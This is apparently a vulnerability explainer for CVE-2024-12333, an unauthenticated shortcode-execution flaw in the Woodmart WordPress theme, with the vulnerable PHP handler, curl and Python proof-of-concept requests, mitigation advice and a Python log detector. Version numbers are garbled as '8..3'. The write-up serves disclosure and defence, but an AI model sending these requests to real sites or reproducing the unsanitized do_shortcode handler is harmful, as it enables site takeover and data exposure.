CVE-2024-12333 - Remote Code Execution in Woodmart WordPress Theme (Up to v8..3) Explained With Exploit Code
Woodmart is a popular premium theme for WordPress, powering thousands of ecommerce and business sites. In early 2024, a critical security vulnerability was found and catalogued as CVE-2024-12333. This flaw allows anyone — even users who aren't logged in — to execute arbitrary WordPress shortcodes on affected sites. That opens the door to privilege escalation, data exposure, and potentially full site compromises.
Below, we'll break down how this vulnerability works, what the exploit looks like, and what admins can do to protect their sites.
[References](#references)
## What is CVE-2024-12333?
All versions of the Woodmart theme prior to and including 8..3 are vulnerable to arbitrary shortcode execution via an AJAX action called woodmart_instagram_ajax_query. This action is available to unauthenticated users.
There is no proper validation or sanitization of the AJAX parameter passed to the server, which means an attacker can control the content passed to WordPress's do_shortcode function. This allows execution of any shortcode WordPress recognizes — including those from plugins or the WordPress core.
## How does the exploit work?
WordPress themes and plugins use shortcodes to add dynamic features. But running unsanitized user input through do_shortcode is highly dangerous.
WordPress executes the attacker's shortcode server-side.
This is especially problematic if the site has plugins that provide dangerous shortcodes (e.g., displaying user or admin info, running PHP, etc.)
Vulnerable code (simplified)
```php
// from woodmart theme's AJAX handler
add_action('wp_ajax_woodmart_instagram_ajax_query', 'woodmart_instagram_handler');
add_action('wp_ajax_nopriv_woodmart_instagram_ajax_query', 'woodmart_instagram_handler');

function woodmart_instagram_handler() {
    $shortcode = $_POST['shortcode']; // NO VALIDATION
    echo do_shortcode($shortcode);    // DANGEROUS
    wp_die();
}
```
## Proof-of-Concept Exploit
You can exploit CVE-2024-12333 with a simple POST request. The endpoint is /wp-admin/admin-ajax.php and the action is woodmart_instagram_ajax_query. Supply any shortcode as the shortcode parameter.
Example: Reveal basic site info using WordPress's [site-title] shortcode.
Exploit in Bash (curl)
```bash
curl -X POST "https://victim.site/wp-admin/admin-ajax.php" \
  -d "action=woodmart_instagram_ajax_query" \
  -d "shortcode=[site-title]"
```
Advanced Exploit
If there's a shortcode that outputs sensitive info, use it instead. If the site has another plugin with more dangerous shortcodes (sometimes allowing file read or even PHP execution!), the result could be catastrophic.
Example for listing all users (if a plugin provides [users] shortcode)
```bash
curl -X POST "https://victim.site/wp-admin/admin-ajax.php" \
  -d "action=woodmart_instagram_ajax_query" \
  -d "shortcode=[users]"
```
Exploit in Python
```python
import requests

url = "https://victim.site/wp-admin/admin-ajax.php"
data = {
    "action": "woodmart_instagram_ajax_query",
    "shortcode": "[site-title]"
}
r = requests.post(url, data=data)
print(r.text)
```
## Potential Impact
- Information Disclosure: Display site info, user lists, or sensitive details using built-in or plugin-supplied shortcodes.
- Privilege Escalation: If a plugin allows user or role modifications via shortcode, attackers can escalate privileges.
- Full Site Compromise: With code-execution shortcodes (e.g., certain 'PHP do' plugins), an attacker could fully take over the site.
Remember, some site builders or plugins offer shortcodes that allow for file inclusion, uploads, SQL queries, or raw PHP execution. Those are extremely dangerous in this context!
## Mitigation & Fix
Woodmart fixed this issue in version 8..4 and newer.
If you use Woodmart:
- Update immediately to the latest version from Themeforest.
- Audit your plugin stack for dangerous shortcodes.
- Consider using a WordPress firewall (like Wordfence or NinjaFirewall) that blocks rogue POST requests to admin-ajax.
Quick hotfix (not recommended long term):
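Disable the vulnerable action in functions.php. The call only takes effect if it runs after the theme has registered the handler, and the callback name must match the one the theme actually registers (the name below is from the simplified snippet above):

```php
remove_action('wp_ajax_nopriv_woodmart_instagram_ajax_query', 'woodmart_instagram_handler');
```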
But still update to the latest version!
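For the firewall point above, this added example (not part of the original article or of Woodmart's code) shows detection logic that flags POSTs to the vulnerable action whose `shortcode` parameter carries a tag the site's own front end would not send. The record format, the sample data and the `EXPECTED_TAGS` allowlist are assumptions; the action and parameter names follow the simplified handler above.

```python
import re
from urllib.parse import parse_qs, urlsplit

ACTION = "woodmart_instagram_ajax_query"  # AJAX action named in the article
PARAM = "shortcode"                       # parameter used by the simplified handler
EXPECTED_TAGS = {"woodmart_instagram"}    # hypothetical: tags your own front end sends
TAG_RE = re.compile(r"\[/?([\w-]+)")      # opening or closing shortcode tag


def unexpected_tags(url, body):
    """Return shortcode tags in a request that the front end should never send."""
    parts = urlsplit(url)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return []
    query = parse_qs(parts.query, keep_blank_values=True)
    form = parse_qs(body, keep_blank_values=True)
    # admin-ajax.php takes the action from $_REQUEST, so check URL and body.
    if ACTION not in query.get("action", []) + form.get("action", []):
        return []
    # The simplified handler reads $_POST only, so inspect body values.
    tags = {t for v in form.get(PARAM, []) for t in TAG_RE.findall(v)}
    return sorted(tags - EXPECTED_TAGS)


def scan(records):
    """Return (client, tags) for each POST record carrying an unexpected tag."""
    hits = ((r["client"], unexpected_tags(r["url"], r.get("body", "")))
            for r in records if r["method"] == "POST")
    return [(client, tags) for client, tags in hits if tags]


# Constructed sample records (documentation IP ranges), as a WAF or reverse
# proxy with request-body logging would capture them.
SAMPLE = [
    {"client": "192.0.2.10", "method": "POST", "url": "/wp-admin/admin-ajax.php",
     "body": "action=woodmart_instagram_ajax_query&shortcode=%5Bwoodmart_instagram+number%3D%226%22%5D"},
    {"client": "198.51.100.7", "method": "POST", "url": "/wp-admin/admin-ajax.php",
     "body": "action=woodmart_instagram_ajax_query&shortcode=%5Busers%5D"},
    {"client": "198.51.100.7", "method": "POST",
     "url": "/wp-admin/admin-ajax.php?action=woodmart_instagram_ajax_query",
     "body": "shortcode=[site-title]"},
    {"client": "203.0.113.5", "method": "POST", "url": "/wp-admin/admin-ajax.php",
     "body": "action=heartbeat&shortcode=%5Busers%5D"},
]

if __name__ == "__main__":
    for client, tags in scan(SAMPLE):
        print(client, tags)
```

Standard access logs do not record POST bodies, so this check needs a source that does, such as a WAF audit log.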
## References
- Official Woodmart changelog with fix (Themeforest)
- CVE-2024-12333 entry (NVD)
- WPScan vulnerability DB entry
- Wordfence Blog - Woodmart Shortcode Exploit
Bottom line:
If your site uses the Woodmart theme, update to 8..4 or newer ASAP. Arbitrary shortcode execution is about as critical as it gets for WordPress. Don't wait — attackers can exploit this without even logging in!
*Stay safe and spread the word to other Woodmart users!*
Timeline
Published on: 12/12/2024 09:15:05 UTC